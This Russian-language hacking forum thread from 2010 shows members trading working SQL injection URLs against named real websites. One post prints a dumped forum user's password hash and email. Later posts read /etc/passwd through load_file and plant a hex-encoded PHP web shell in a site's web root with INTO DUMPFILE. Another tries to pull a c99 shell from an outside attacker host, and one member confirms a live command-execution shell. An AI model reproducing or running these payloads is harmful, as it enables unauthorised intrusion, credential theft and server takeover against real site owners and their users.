17.03.2010, 22:54
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
Сообщение от Strilo4ka
Ну смотрим кто что скажет...
выпригует алерт с ошибкой выполнения запроса (логирования)...
самое интересное что это компания которая проводит аудит безопасности 
И вот тоже как блинд крутить можно ...
О компании
с юнион мну не получилось...
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111
Код:
http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5--
~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~
|
|
|
17.03.2010, 23:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от [Feldmarschall]
MySQL версия 5.0.67
Data Бaзы:information_schema
b10160_forum
b10160_fresh
b10160_linsm
Current User: u10160@78.108.81.111
Код:
http://www.lins-m.ru/index.php?ID=-1+union+select+1,%28SELECT+concat%280x7e,0x27,phpbb_users.user_password,0x27,0x7e,phpbb_users.username,0x27,0x7e,phpbb_users.user_email,0x27,0x7e,phpbb_users.user_id,0x27,0x7e%29+FROM+b10160_forum.phpbb_users+LIMIT+2,1%29%20,3,4,5--
~'880cbc1ed48043cbcdaa7286e058ef7f'~Евгений '~enevzorov@lins-m.ru'~3'~
молодец ступил просто
когда посылал
http://www.lins-m.ru/index.php?ID=50+order+by+4--+
то контент выводился,
а когда
http://www.lins-m.ru/index.php?ID=50+order+by+5--+
нет , и решил шо 4 поля, +++
Сайт походу умер, за ним не следять так как Copyright © 2008, LINS-M... Просто целесообразно текущий год ставить, имхо...
|
|
|
|
18.03.2010, 01:40
|
|
Banned
Регистрация: 04.06.2009
Сообщений: 58
С нами:
8913322
Репутация:
23
|
|
Дальше сам 
PHP код:
http://www.enlighteneddating.com/softbizDatingScript/products.php?cid=49+and+1=0+union+select+1,version(),3,4,5--
|
|
|
|
18.03.2010, 01:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
PHP код:
http://www.enlighteneddating.com/softbizDatingScript/search_results.php?browse=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),database(),user()),30,31,32,33,34,35,36,37,38,39/*
... |
|
|
|
18.03.2010, 08:53
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
вот есть саyт..
версия 4.1.18..есть mysql.user и file_priv Y..
хочу заливать шелл..
читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+
а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+
а здесь видно папка
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+
и потом здеlaю так..
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*
http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?
и не получается
обшем поjaлуста помоqите заливат шелл
|
|
|
|
18.03.2010, 10:10
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от LokbatanLi
вот есть саyт..
версия 4.1.18..есть mysql.user и file_priv Y..
хочу заливать шелл..
читаю /etc/passwd
http://www.georgica.net/analitic/?page=ru&id=-303'+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8+from+mysql.user+--+
а потом '/'
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/%27),4,5,6,7,8+from+mysql.user+--+
а здесь видно папка
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+1,2,load_file(%27/home/www/htdocs/%27),4,5,6,7,8+from+mysql.user+--+
и потом здеlaю так..
http://www.georgica.net/analitic/?page=ru&id=-303%27+union+select+%3C?include($_GET[%22cmd%22]);?%3E,1,2,3,4,5,6,7+from+mysql.user/**/into/**/outfile/**/%27/home/www/htdocs/rfi.php%27/*
http://www.georgica.net/rfi.php?cmd=http://azattacker.org/forum/c99.txt?
и не получается
обшем поjaлуста помоqите заливат шелл
чё то я не могу понять а вывод, то есть команды?
вот чё то я пеопробовал и файло у меня не перечиталось
|
|
|
|
18.03.2010, 10:20
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
LokbatanLi!как то ты по извращенному льешь шелл
Вот! http://www.georgica.net/temp/1.php?id=ls
вывод в файл работает!
http://www.georgica.net/analitic/?page=ru&id=-303'+UNION+SELECT+0x3C3F206563686F20223C7072653E22 3B6563686F2073797374656D28245F4745545B226964225D29 3B6563686F20223C2F7072653E22203F3E,2,3,4,5,6,7,8+F ROM+mysql.user+INTO+DUMPFILE+'/home/www/htdocs/temp/1.php'+--+
все норм
Последний раз редактировалось Rubaka; 18.03.2010 в 10:35..
Причина: поправка!
|
|
|
|
18.03.2010, 10:39
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
Rubaka
a qde shell ??
http://www.georgica.net/temp/1.php?id=http://azattacker.org/forum/c99.txt?
|
|
|
|
18.03.2010, 10:49
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
Вот шелл http://www.georgica.net/temp/1.php?id=ls <------в id комманды передаешь!!
а не инклюдишь!
тама код system($_GET["id"]); прописан!
и ты могешь мля не писать транслитом!!!!!!!!!!!
Последний раз редактировалось Rubaka; 18.03.2010 в 11:18..
Причина: +
|
|
|
|
18.03.2010, 10:54
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами:
8797559
Репутация:
-16
|
|
net ne kak ne moqu ponyat izvini..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?1991020){kind=avatar}
Похожие темы
Комбинированный вид
